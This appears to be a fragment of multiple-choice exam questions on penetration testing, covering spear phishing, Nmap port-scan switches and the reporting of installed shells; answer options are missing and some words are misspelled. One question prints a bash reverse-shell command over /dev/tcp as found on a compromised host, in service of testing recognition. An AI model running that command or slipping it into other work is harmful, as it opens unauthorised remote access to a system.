Which of the following is an example of a spear phishing attack?
The following line was found in an exploited machine's history file. An attacker ran the following command:
bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?
A penetration tester is required to report installed shells on compromised systems. Which of the following is the reason?
A constant wants to scan all the TCP Pots on an identified device. Which of the following Nmap switches will complete this task?